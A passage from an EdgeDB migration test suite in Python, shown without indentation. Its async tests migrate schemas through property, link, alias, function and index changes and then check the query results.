# Migrate to same state as before now that the data is fixed.
await self.migrate(new_state)
await self.assert_query_result(
r"""
SELECT Base {
foo,
};
""",
[{
'foo': 'base_09',
}],
)
async def test_edgeql_migration_eq_11(self):
await self.migrate(r"""
type Base {
property foo -> str;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := 'base_11',
};
""")
await self.migrate(r"""
type Child;
type Base {
# change property to link with same name
link foo -> Child {
# add a constraint
constraint exclusive;
}
}
""")
await self.assert_query_result(
r"""
SELECT Base {
foo,
};
""",
[{
'foo': None,
}],
)
async def test_edgeql_migration_eq_12(self):
await self.migrate(r"""
type Child;
type Base {
property foo -> str {
constraint exclusive;
}
link bar -> Child {
constraint exclusive;
}
}
""")
await self.con.execute("""
SET MODULE test;
""")
data = await self.con.query(r"""
SELECT (
INSERT Base {
foo := 'base_12',
bar := (INSERT Child)
})
{
foo,
bar: {id}
};
""")
await self.migrate(r"""
type Child;
type Base {
# drop constraints
property foo -> str;
link bar -> Child;
}
""")
await self.assert_query_result(
r"""
SELECT Base {
foo,
bar: {id}
};
""",
[{
'foo': 'base_12',
'bar': {'id': data[0].bar.id}
}],
)
async def test_edgeql_migration_eq_13(self):
await self.migrate(r"""
type Child;
type Base {
link bar -> Child;
}
type Derived extending Base {
overloaded required link bar -> Child;
}
""")
await self.con.execute("""
SET MODULE test;
""")
data = await self.con.query(r"""
SELECT (
INSERT Derived {
bar := (INSERT Child)
})
{
bar: {id}
};
""")
await self.migrate(r"""
type Child;
type Base;
# drop 'bar'
type Derived extending Base {
# no longer inherit link 'bar'
link bar -> Child;
}
""")
await self.assert_query_result(
r"""
SELECT Derived {
bar: {id}
};
""",
[{
'bar': {'id': data[0].bar.id}
}],
)
async def test_edgeql_migration_eq_14a(self):
await self.migrate(r"""
type Base;
type Derived extending Base {
property foo -> str;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Derived {
foo := 'derived_14',
};
""")
await self.migrate(r"""
type Base {
# move the property earlier in the inheritance
property foo -> str;
}
type Derived extending Base {
overloaded property foo -> str {
annotation title := 'overloaded'
}
}
""")
await self.assert_query_result(
r"""
SELECT Derived {
foo,
};
""",
[{
'foo': 'derived_14',
}],
)
async def test_edgeql_migration_eq_14b(self):
# Same as above, except POPULATE and inspect the query
await self.migrate(r"""
type Base;
type Derived extending Base {
property foo -> str;
}
""")
await self.start_migration(r"""
type Base {
# move the property earlier in the inheritance
property foo -> str;
}
type Derived extending Base {
overloaded required property foo -> str;
}
""", populate=True)
await self.assert_describe_migration({
'confirmed': ["""
ALTER TYPE test::Base {
CREATE PROPERTY foo -> std::str;
};
""", """
ALTER TYPE test::Derived {
ALTER PROPERTY foo {
SET REQUIRED;
};
};
"""],
'complete': True,
})
async def test_edgeql_migration_eq_16(self):
await self.migrate(r"""
type Child;
type Base;
type Derived extending Base {
link bar -> Child;
}
""")
await self.con.execute("""
SET MODULE test;
""")
data = await self.con.query(r"""
SELECT (
INSERT Derived {
bar := (INSERT Child),
}
) {
bar: {id}
};
""")
await self.migrate(r"""
type Child;
type Base {
# move the link earlier in the inheritance
link bar -> Child;
}
type Derived extending Base;
""")
await self.assert_query_result(
r"""
SELECT Derived {
bar,
};
""",
[{
'bar': {'id': data[0].bar.id},
}],
)
await self.migrate(
r"""
type Child;
type Base {
link bar -> Child;
}
type Derived extending Base {
# also make the link 'required'
overloaded required link bar -> Child;
}
""",
user_input=[
'.bar',
],
)
await self.assert_query_result(
r"""
SELECT Derived {
bar,
};
""",
[{
'bar': {'id': data[0].bar.id},
}],
)
async def test_edgeql_migration_eq_18(self):
await self.migrate(r"""
type Base {
property name := 'computable'
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.migrate(r"""
type Base {
# change a property from a computable to regular with a default
property name -> str {
default := 'something'
}
}
""")
# Insert a new object, this one should have a new default name.
await self.con.execute(r"""
INSERT Base;
""")
await self.assert_query_result(
r"""
SELECT Base {
name,
} ORDER BY .name EMPTY LAST;
""",
[{
'name': 'something',
}, {
'name': 'something',
}],
)
async def test_edgeql_migration_eq_19(self):
await self.migrate(r"""
type Base {
property name -> str
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
name := 'base_19'
};
""")
await self.migrate(r"""
type Base {
# change a regular property to a computable
property name := 'computable'
}
""")
await self.assert_query_result(
r"""
SELECT Base {
name,
};
""",
[{
'name': 'computable',
}],
)
async def test_edgeql_migration_eq_21(self):
await self.migrate(r"""
type Base {
property foo -> str;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := 'base_21'
};
""")
await self.migrate(r"""
type Base {
property foo -> str;
# add a property
property bar -> int64;
}
""")
await self.con.execute(r"""
UPDATE Base
SET {
bar := 21
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo,
bar
};
""",
[{
'foo': 'base_21',
'bar': 21,
}],
)
await self.migrate(r"""
type Base {
# make the old property into a computable
property foo := <str>__source__.bar;
property bar -> int64;
}
""")
await self.assert_query_result(
r"""
SELECT Base {
foo,
bar
};
""",
[{
'foo': '21',
'bar': 21,
}],
)
async def test_edgeql_migration_eq_22(self):
await self.migrate(r"""
type Base {
property foo -> str;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := 'base_22'
};
""")
await self.migrate(r"""
# rename the type, although this test doesn't ensure that
# renaming actually took place
type NewBase {
property foo -> str;
}
""")
await self.assert_query_result(
r"""
SELECT NewBase {
foo,
};
""",
[{
'foo': 'base_22',
}],
)
await self.migrate(r"""
type NewBase {
property foo -> str;
# add a property
property bar -> int64;
}
""")
await self.con.execute(r"""
UPDATE NewBase
SET {
bar := 22
};
""")
await self.assert_query_result(
r"""
SELECT NewBase {
foo,
bar
};
""",
[{
'foo': 'base_22',
'bar': 22,
}],
)
await self.migrate(r"""
type NewBase {
# drop 'foo'
property bar -> int64;
}
# add a alias to emulate the original
alias Base := (
SELECT NewBase {
foo := <str>.bar
}
);
""")
await self.assert_query_result(
r"""
SELECT Base {
foo,
};
""",
[{
'foo': '22',
}],
)
@test.xfail('''
edgedb.errors.SchemaError: ObjectType 'test::Base' is already
present in the schema <Schema gen:3757 at 0x7fc3319fa820>
Exception: Error while processing
'CREATE ALIAS test::Base := (
SELECT
test::Child {
bar := test::Child
}
);'
''')
async def test_edgeql_migration_eq_23(self):
await self.migrate(r"""
type Child {
property foo -> str;
}
type Base {
link bar -> Child;
}
alias Alias01 := (
SELECT Base {
child_foo := .bar.foo
}
);
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
bar := (
INSERT Child {
foo := 'child_23'
}
)
};
""")
await self.migrate(r"""
type Child {
property foo -> str;
}
# exchange a type for a alias
alias Base := (
SELECT Child {
# bar is the same as the root object
bar := Child
}
);
alias Alias01 := (
# now this alias refers to another alias
SELECT Base {
child_foo := .bar.foo
}
);
""")
await self.assert_query_result(
r"""
SELECT Alias01 {
child_foo,
};
""",
[{
'child_foo': 'child_23',
}],
)
async def test_edgeql_migration_eq_24(self):
await self.migrate(r"""
type Child;
type Base {
link bar -> Child;
}
""")
await self.con.execute("""
SET MODULE test;
""")
data = await self.con.query(r"""
SELECT (
INSERT Base {
bar := (INSERT Child)
}
) {
bar: {id}
}
""")
await self.migrate(r"""
type Child;
type Base {
# increase link cardinality
multi link bar -> Child;
}
""")
await self.assert_query_result(
r"""
SELECT Base {
bar: {id},
};
""",
[{
'bar': [{'id': data[0].bar.id}],
}],
)
async def test_edgeql_migration_eq_25(self):
await self.migrate(r"""
type Child;
type Base {
multi link bar -> Child;
}
""")
await self.con.execute("""
SET MODULE test;
""")
data = await self.con.query(r"""
SELECT (
INSERT Base {
bar := (INSERT Child)
}
) {
bar: {id}
}
""")
await self.migrate(r"""
type Child;
type Base {
# reduce link cardinality
link bar -> Child;
}
""", user_input=[
'(SELECT .bar LIMIT 1)'
])
await self.assert_query_result(
r"""
SELECT Base {
bar: {id},
};
""",
[{
'bar': {'id': data[0].bar[0].id},
}],
)
await self.migrate(r"""
type Child;
type Base {
link bar -> Child {
# further restrict the link
constraint exclusive
}
}
""")
await self.assert_query_result(
r"""
SELECT Base {
bar: {id},
};
""",
[{
'bar': {'id': data[0].bar[0].id},
}],
)
async def test_edgeql_migration_eq_26(self):
await self.migrate(r"""
type Child;
type Parent {
link bar -> Child;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Parent {
bar := (INSERT Child)
};
""")
await self.migrate(r"""
type Child;
type Parent {
link bar -> Child;
}
# derive a type
type DerivedParent extending Parent;
""")
await self.assert_query_result(
r"""
SELECT Parent {
type := .__type__.name,
bar_type := .bar.__type__.name
};
""",
[{
'type': 'test::Parent',
'bar_type': 'test::Child',
}],
)
await self.migrate(
r"""
type Child;
type DerivedChild extending Child;
type Parent {
link bar -> Child;
}
type DerivedParent extending Parent;
""",
)
await self.migrate(
r"""
type Child;
type DerivedChild extending Child;
type Parent {
link bar -> Child;
}
# derive a type with a more restrictive link
type DerivedParent extending Parent {
overloaded link bar -> DerivedChild;
}
""",
user_input=[".bar[IS DerivedChild]"],
)
await self.con.execute(r"""
INSERT DerivedParent {
bar := (INSERT DerivedChild)
}
""")
await self.assert_query_result(
r"""
SELECT Parent {
type := .__type__.name,
bar_type := .bar.__type__.name
} ORDER BY .bar_type;
""",
[{
'type': 'test::Parent',
'bar_type': 'test::Child',
}, {
'type': 'test::DerivedParent',
'bar_type': 'test::DerivedChild',
}],
)
async def test_edgeql_migration_eq_27(self):
await self.migrate(r"""
abstract type Named {
property name -> str;
}
type Foo extending Named;
type Bar extending Named;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Foo {
name := 'foo_27',
};
INSERT Bar {
name := 'bar_27',
};
""")
await self.migrate(r"""
abstract type Named {
property name -> str;
}
# the types stop extending named, but retain the property
# 'name'
type Foo {
property name -> str;
};
type Bar {
property name -> str;
};
""")
await self.assert_query_result(
r"""
SELECT Foo.name;
""",
[
'foo_27',
],
)
await self.assert_query_result(
r"""
SELECT Bar.name;
""",
[
'bar_27',
],
)
await self.migrate(r"""
abstract type Named {
property name -> str;
}
type Foo {
property name -> str;
};
type Bar {
# rename 'name' to 'title'
property title -> str;
};
""")
await self.assert_query_result(
r"""
SELECT Foo.name;
""",
[
'foo_27',
],
)
await self.assert_query_result(
r"""
SELECT Bar.title;
""",
[
'bar_27',
],
)
async def test_edgeql_migration_eq_29(self):
await self.migrate(r"""
type Child {
property foo -> str;
}
alias Base := (
SELECT Child {
bar := .foo
}
);
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Child {
foo := 'child_29',
};
""")
await self.migrate(r"""
# drop everything
""")
async def test_edgeql_migration_eq_30(self):
await self.migrate(r"""
type Foo {
property name -> str;
};
type Bar {
property title -> str;
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Foo {
name := 'foo_30',
};
INSERT Bar {
title := 'bar_30',
};
""")
await self.migrate(r"""
type Foo {
property name -> str;
};
type Bar {
# rename 'title' to 'name'
property name -> str;
};
""")
await self.assert_query_result(
r"""
SELECT Foo.name;
""",
[
'foo_30',
],
)
await self.assert_query_result(
r"""
SELECT Bar.name;
""",
[
'bar_30',
],
)
await self.migrate(r"""
# both types have a name, so the name prop is factored out
# into a more basic type.
abstract type Named {
property name -> str;
}
type Foo extending Named;
type Bar extending Named;
""")
await self.assert_query_result(
r"""
SELECT Foo.name;
""",
[
'foo_30',
],
)
await self.assert_query_result(
r"""
SELECT Bar.name;
""",
[
'bar_30',
],
)
async def test_edgeql_migration_eq_31(self):
# Issue 727.
#
# Starting with the sample schema (from frontpage) migrate to
# a schema with only type User.
await self.migrate(r"""
# This is an abstract object containing
# text.
abstract type Text {
required property body -> str {
# Maximum length of text is 10000
# characters.
constraint max_len_value(10000);
}
}
type User {
required property name -> str;
}
abstract type Owned {
# By default links are optional.
required link owner -> User;
}
# UniquelyNamed is a an abstract type that
# enforces name uniqueness across all
# instances of its subtype.
abstract type UniquelyNamed {
required property name -> str {
delegated constraint exclusive;
}
}
type Status extending UniquelyNamed;
type Priority extending UniquelyNamed;
# LogEntry is an Owned and a Text,
# so it will have all of their links
# and properties, in particular, the
# "owner" link and the "body" property.
type LogEntry extending Owned, Text {
required property spent_time -> int64;
}
type Comment extending Text, Owned {
required link issue -> Issue;
link parent -> Comment;
}
# issue_num_t is defined as a concrete
# sequence type, used to generate
# sequential issue numbers.
scalar type issue_num_t extending sequence;
type Issue extending Owned, Text {
required property title -> str;
required property number -> issue_num_t {
# The number values are automatically
# generated, and are not supposed to be
# directly writable.
readonly := true;
}
property time_estimate -> int64;
property start_date -> datetime {
# The default value of start_date will be a
# result of the EdgeQL expression above.
default := (SELECT datetime_current());
}
property due_date -> datetime;
required link status -> Status;
link priority -> Priority;
# The watchers link is mapped to User
# type in many-to-many relation.
multi link watchers -> User;
multi link time_spent_log -> LogEntry {
# Exclusive multi-link represents
# a one-to-many relation.
constraint exclusive;
}
multi link related_to -> Issue;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Status {
name := 'Open'
};
INSERT Status {
name := 'Closed'
};
INSERT User {
name := 'cosmophile'
};
""")
await self.migrate(r"""
type User {
required property name -> str;
}
""")
# there's only the User left
await self.assert_query_result(
r"""
SELECT User.name;
""",
[
'cosmophile',
],
)
async def test_edgeql_migration_eq_32(self):
# Issue 727.
#
# Starting with a small schema migrate to remove its elements.
# There are non-zero default Objects existing in a fresh blank
# database because of placeholder objects used for GraphQL.
start_objects = await self.con.query_single(r"""
SELECT count(Object);
""")
await self.migrate(r"""
type LogEntry {
required property spent_time -> int64;
}
type Issue {
multi link time_spent_log -> LogEntry {
constraint exclusive;
}
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT LogEntry {
spent_time := 100
};
INSERT Issue {
time_spent_log := LogEntry
};
""")
await self.migrate(r"""
type LogEntry {
required property spent_time -> int64;
}
""")
# there's only the LogEntry left
await self.assert_query_result(
r"""
SELECT LogEntry.spent_time;
""",
[
100,
],
)
await self.assert_query_result(
r"""
SELECT count(Object);
""",
[
start_objects + 1,
],
)
await self.migrate(r"""
# empty schema
""")
# no more additional objects
await self.assert_query_result(
r"""
SELECT count(Object);
""",
[
start_objects,
],
)
async def test_edgeql_migration_eq_33(self):
await self.migrate(r"""
type Child;
type Base {
link foo -> Child;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Child;
INSERT Base {
foo := (SELECT Child LIMIT 1)
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: {
__type__: {name},
}
};
""",
[{
'foo': {
'__type__': {'name': 'test::Child'},
}
}],
)
await self.migrate(
r"""
type Child;
type Child2;
type Base {
link foo -> Child;
}
""",
)
await self.migrate(
r"""
type Child;
type Child2;
type Base {
# change link type
link foo -> Child2;
}
""",
user_input=[
'.foo[IS Child2]'
],
)
await self.assert_query_result(
r"""
SELECT Base {
foo: {
__type__: {name},
}
};
""",
[{
# the link is empty because the target was changed
'foo': None
}],
)
await self.con.execute(r"""
INSERT Child2;
UPDATE Base
SET {
foo := (SELECT Child2 LIMIT 1)
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: {
__type__: {name},
}
};
""",
[{
'foo': {
'__type__': {'name': 'test::Child2'},
}
}],
)
async def test_edgeql_migration_eq_34(self):
# this is the reverse of test_edgeql_migration_eq_11
await self.migrate(r"""
type Child;
type Base {
link foo -> Child {
constraint exclusive;
}
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Child;
INSERT Base {
foo := (SELECT Child LIMIT 1)
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: {
__type__: {name},
}
};
""",
[{
'foo': {
'__type__': {'name': 'test::Child'},
}
}],
)
await self.migrate(r"""
type Base {
# change link to property with same name
property foo -> str;
}
""")
await self.assert_query_result(
r"""
SELECT Base {
foo
};
""",
[{
# the property is empty now
'foo': None
}],
)
await self.con.execute(r"""
UPDATE Base
SET {
foo := 'base_foo_34'
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo
};
""",
[{
'foo': 'base_foo_34'
}],
)
async def test_edgeql_migration_eq_35(self):
await self.migrate(r"""
type Child {
required property name -> str;
}
type Base {
multi link foo := (
SELECT Child FILTER .name = 'computable_35'
)
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Child {
name := 'computable_35'
};
INSERT Base;
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: {
name
},
};
""",
[{
'foo': [{
'name': 'computable_35',
}]
}]
)
await self.migrate(r"""
type Child {
required property name -> str;
}
type Base {
# change a link from a computable to regular
multi link foo -> Child;
}
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: {
name
},
};
""",
[{
'foo': []
}]
)
# Make sure that the new 'foo' can be updated.
await self.con.execute(r"""
INSERT Child {
name := 'child_35'
};
UPDATE Base
SET {
foo := (
SELECT Child FILTER .name = 'child_35'
)
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: {
name
},
};
""",
[{
'foo': [{
'name': 'child_35'
}]
}]
)
async def test_edgeql_migration_eq_36(self):
await self.migrate(r"""
type Child {
required property name -> str;
}
type Base {
multi link foo -> Child;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Child {
name := 'computable_36'
};
INSERT Child {
name := 'child_36'
};
INSERT Base {
foo := (
SELECT Child FILTER .name = 'child_36'
)
};
""")
await self.migrate(r"""
type Child {
required property name -> str;
}
type Base {
# change a regular link to a computable
link foo := (
SELECT Child FILTER .name = 'computable_36'
LIMIT 1
)
}
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: {
name
},
};
""",
[{
'foo': {
'name': 'computable_36'
}
}]
)
async def test_edgeql_migration_eq_37(self):
# testing schema alias
await self.migrate(r"""
type Base;
alias BaseAlias := (
SELECT Base {
foo := 'base_alias_37'
}
)
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo
};
""",
[{
'foo': 'base_alias_37'
}]
)
await self.migrate(r"""
type Base;
alias BaseAlias := (
SELECT Base {
# "rename" a computable, since the value is given and
# not stored, this is no different from dropping
# original and creating a new property
foo2 := 'base_alias_37'
}
)
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo2
};
""",
[{
'foo2': 'base_alias_37'
}]
)
with self.assertRaisesRegex(
edgedb.InvalidReferenceError,
r"object type 'test::Base' has no link or property 'foo'"):
await self.con.execute(r"""
SELECT BaseAlias {
foo
};
""")
async def test_edgeql_migration_eq_38(self):
# testing schema alias
await self.migrate(r"""
type Base;
alias BaseAlias := (
SELECT Base {
foo := 'base_alias_38'
}
)
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo
};
""",
[{
'foo': 'base_alias_38'
}]
)
await self.migrate(r"""
type Base;
alias BaseAlias := (
SELECT Base {
# keep the name, but change the type
foo := 38
}
)
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo
};
""",
[{
'foo': 38
}]
)
async def test_edgeql_migration_eq_39(self):
# testing schema alias
await self.migrate(r"""
type Base;
type Foo {
property name -> str
}
alias BaseAlias := (
SELECT Base {
foo := (SELECT Foo FILTER .name = 'base_alias_39')
}
)
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
INSERT Foo {name := 'base_alias_39'};
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo: {
name
}
};
""",
[{
'foo': [{
'name': 'base_alias_39'
}]
}]
)
await self.migrate(r"""
type Base;
type Foo {
property name -> str
}
alias BaseAlias := (
SELECT Base {
# "rename" a computable, since the value is given and
# not stored, this is no different from dropping
# original and creating a new multi-link
foo2 := (SELECT Foo FILTER .name = 'base_alias_39')
}
)
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo2: {
name
}
};
""",
[{
'foo2': [{
'name': 'base_alias_39'
}]
}]
)
with self.assertRaisesRegex(
edgedb.InvalidReferenceError,
r"object type 'test::Base' has no link or property 'foo'"):
await self.con.execute(r"""
SELECT BaseAlias {
foo: {
name
}
};
""")
async def test_edgeql_migration_eq_40(self):
# testing schema alias
await self.migrate(r"""
type Base;
type Foo {
property name -> str
}
type Bar {
property name -> str
}
alias BaseAlias := (
SELECT Base {
foo := (SELECT Foo FILTER .name = 'foo_40')
}
)
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
INSERT Foo {name := 'foo_40'};
INSERT Bar {name := 'bar_40'};
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo: {
name
}
};
""",
[{
'foo': [{
'name': 'foo_40'
}]
}]
)
await self.migrate(r"""
type Base;
type Foo {
property name -> str
}
type Bar {
property name -> str
}
alias BaseAlias := (
SELECT Base {
# keep the name, but change the type
foo := (SELECT Bar FILTER .name = 'bar_40')
}
)
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo: {
name
}
};
""",
[{
'foo': [{
'name': 'bar_40'
}]
}]
)
async def test_edgeql_migration_eq_41(self):
# testing schema alias
await self.migrate(r"""
type Base;
type Foo {
property name -> str
}
alias BaseAlias := (
SELECT Base {
foo := (
SELECT Foo {
@bar := 'foo_bar_alias_41'
}
FILTER .name = 'base_alias_41'
)
}
)
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
INSERT Foo {name := 'base_alias_41'};
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo: {
name,
@bar
}
};
""",
[{
'foo': [{
'name': 'base_alias_41',
'@bar': 'foo_bar_alias_41',
}]
}]
)
await self.migrate(r"""
type Base;
type Foo {
property name -> str
}
alias BaseAlias := (
SELECT Base {
foo := (
SELECT Foo {
# "rename" a computable link property, since
# the value is given and not stored, this is
# no different from dropping original and
# creating a new multi-link
@baz := 'foo_bar_alias_41'
}
FILTER .name = 'base_alias_41'
)
}
)
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo: {
name,
@baz
}
};
""",
[{
'foo': [{
'name': 'base_alias_41',
'@baz': 'foo_bar_alias_41'
}]
}]
)
with self.assertRaisesRegex(
edgedb.InvalidReferenceError,
r"link 'foo' .* has no property 'bar'"):
await self.con.execute(r"""
SELECT BaseAlias {
foo: {
name,
@bar
}
};
""")
async def test_edgeql_migration_eq_42(self):
# testing schema alias
await self.migrate(r"""
type Base;
type Foo {
property name -> str
}
alias BaseAlias := (
SELECT Base {
foo := (
SELECT Foo {
@bar := 'foo_bar_alias_42'
}
FILTER .name = 'base_alias_42'
)
}
)
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
INSERT Foo {name := 'base_alias_42'};
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo: {
name,
@bar
}
};
""",
[{
'foo': [{
'name': 'base_alias_42',
'@bar': 'foo_bar_alias_42',
}]
}]
)
await self.migrate(r"""
type Base;
type Foo {
property name -> str
}
alias BaseAlias := (
SELECT Base {
foo := (
SELECT Foo {
# keep the name, but change the type
@bar := 42
}
FILTER .name = 'base_alias_42'
)
}
)
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo: {
name,
@bar
}
};
""",
[{
'foo': [{
'name': 'base_alias_42',
'@bar': 42,
}]
}]
)
async def test_edgeql_migration_eq_43(self):
await self.migrate(r"""
abstract link Ordered {
property index -> int32;
}
type User;
abstract type Permissions {
multi link owners extending Ordered -> User;
};
""")
await self.migrate(r"")
async def test_edgeql_migration_index_01(self):
await self.migrate('''
type Message {
required property text -> str;
index on (.text);
};
''')
await self.migrate('''
type Message {
required property text -> str;
property ts -> datetime;
index on (.text);
index on (.ts);
};
''')
await self.assert_query_result(
r"""
SELECT count((SELECT schema::ObjectType
FILTER .name = 'test::Message').indexes)
""",
[2],
)
async def test_edgeql_migration_rebase_01(self):
await self.migrate(r"""
abstract type C;
abstract type P {
property p -> str;
property p2 -> str;
index on (.p);
};
type Foo extending C {
property foo -> str;
}
""")
await self.migrate(r"""
abstract type C;
abstract type P {
property p -> str;
property p2 -> str;
index on (.p);
};
type Foo extending C, P {
property foo -> str;
}
""")
async def test_edgeql_migration_rebase_02(self):
await self.migrate('''
type User;
abstract type Event {
required property createdAt -> datetime {
default := datetime_current();
}
required link user -> User;
}
type Post extending Event {
required property content -> str {
constraint min_len_value(1);
constraint max_len_value(280);
}
}
''')
await self.start_migration('''
type User;
abstract type Event {
required property createdAt -> datetime {
default := datetime_current();
}
required link user -> User;
}
abstract type HasContent {
required property content -> str {
constraint min_len_value(1);
constraint max_len_value(280);
}
}
type Post extending Event, HasContent {
}
type Reply extending Event, HasContent {
required link post -> Post;
}
''')
# N.B.: these prompts are OK but not canonical; if they are
# broken in favor of something better, just fix them.
await self.interact([
"did you create object type 'test::HasContent'?",
"did you alter object type 'test::Post'?",
"did you create object type 'test::Reply'?",
"did you alter property 'content' of object type 'test::Post'?",
])
async def test_edgeql_migration_rebase_03(self):
await self.migrate('''
abstract type Named {
required property name -> str;
};
type Org;
abstract type OrgBound {
required link org -> Org;
};
abstract type OrgUniquelyNamed
extending Named, OrgBound
{
constraint exclusive on ((.name, .org))
}
''')
await self.start_migration('''
abstract type Named {
required property name -> str;
};
type Org;
abstract type Resource;
abstract type OrgBound {
required link org -> Org;
};
abstract type OrgUniquelyNamedResource
extending Named, Resource, OrgBound
{
delegated constraint exclusive on ((.name, .org))
}
''')
# N.B.: these prompts are OK but not canonical; if they are
# broken in favor of something better, just fix them.
await self.interact([
("did you drop object type 'test::OrgUniquelyNamed'?", "n"),
"did you create object type 'test::Resource'?",
"did you rename object type 'test::OrgUniquelyNamed' to "
"'test::OrgUniquelyNamedResource'?",
"did you alter object type 'test::OrgUniquelyNamedResource'?",
])
async def test_edgeql_migration_rename_01(self):
await self.migrate('''
type Foo;
''')
await self.start_migration('''
type Bar {
property asdf -> str;
};
''')
await self.interact([
"did you rename object type 'test::Foo' to 'test::Bar'?",
"did you create property 'asdf' of object type 'test::Bar'?",
])
async def test_edgeql_migration_rename_02(self):
await self.migrate('''
type Foo {
property asdf -> str;
};
type Bar extending Foo {
overloaded property asdf -> str;
};
''')
await self.start_migration('''
type Foo {
property womp -> str;
};
type Bar extending Foo {
overloaded property womp -> str {
annotation title := "foo";
};
};
''')
await self.interact([
"did you rename property 'asdf' of object type 'test::Foo' to "
"'womp'?" ,
"did you create annotation 'std::title' of property 'womp'?",
])
async def test_edgeql_migration_rename_03(self):
await self.migrate('''
abstract constraint Asdf { using (__subject__ < 10) };
type Foo {
property x -> int64 {
constraint Asdf;
}
}
type Bar extending Foo;
''')
await self.start_migration('''
abstract constraint Womp { using (__subject__ < 10) };
type Foo {
property x -> int64 {
constraint Womp;
}
}
type Bar extending Foo;
''')
await self.interact([
"did you rename abstract constraint 'test::Asdf' to "
"'test::Womp'?",
])
async def test_edgeql_migration_eq_function_01(self):
await self.migrate(r"""
function hello01(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello01(1);""",
['hello1'],
)
# add an extra parameter with a default (so it can be omitted
# in principle)
await self.migrate(r"""
function hello01(a: int64, b: int64=42) -> str
using edgeql $$
SELECT 'hello' ++ <str>(a + b)
$$
""")
await self.assert_query_result(
r"""SELECT hello01(1);""",
['hello43'],
)
await self.assert_query_result(
r"""SELECT hello01(1, 2);""",
['hello3'],
)
async def test_edgeql_migration_eq_function_02(self):
await self.migrate(r"""
function hello02(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello02(1);""",
['hello1'],
)
# add an extra parameter with a default (so it can be omitted
# in principle)
await self.migrate(r"""
function hello02(a: int64, b: OPTIONAL int64=42) -> str
using edgeql $$
SELECT 'hello' ++ <str>(a + b)
$$
""")
await self.assert_query_result(
r"""SELECT hello02(1);""",
['hello43'],
)
await self.assert_query_result(
r"""SELECT hello02(1, 2);""",
['hello3'],
)
async def test_edgeql_migration_eq_function_03(self):
await self.migrate(r"""
function hello03(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello03(1);""",
['hello1'],
)
# add an extra parameter with a default (so it can be omitted
# in principle)
await self.migrate(r"""
function hello03(a: int64, NAMED ONLY b: int64=42) -> str
using edgeql $$
SELECT 'hello' ++ <str>(a + b)
$$
""")
await self.assert_query_result(
r"""SELECT hello03(1);""",
['hello43'],
)
await self.assert_query_result(
r"""SELECT hello03(1, b := 2);""",
['hello3'],
)
async def test_edgeql_migration_eq_function_04(self):
await self.migrate(r"""
function hello04(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello04(1);""",
['hello1'],
)
# same parameters, different return type
await self.migrate(r"""
function hello04(a: int64) -> int64
using edgeql $$
SELECT -a
$$
""")
await self.assert_query_result(
r"""SELECT hello04(1);""",
[-1],
)
async def test_edgeql_migration_eq_function_05(self):
await self.migrate(r"""
function hello05(a: int64) -> str
using edgeql $$
SELECT <str>a
$$
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello05(1);""",
['1'],
)
# same parameters, different return type (array)
await self.migrate(r"""
function hello05(a: int64) -> array<int64>
using edgeql $$
SELECT [a]
$$
""")
await self.assert_query_result(
r"""SELECT hello05(1);""",
[[1]],
)
@test.xfail('''
It should be possible to change the underlying function (to a
compatible one) of a default value without explicitly dropping
the default first.
Currently this kind of works... by proposing we delete the property
and recreate it.
''')
async def test_edgeql_migration_eq_function_06(self):
await self.migrate(r"""
function hello06(a: int64) -> str
using edgeql $$
SELECT <str>a
$$;
type Base {
property foo -> int64 {
# use the function in default value computation
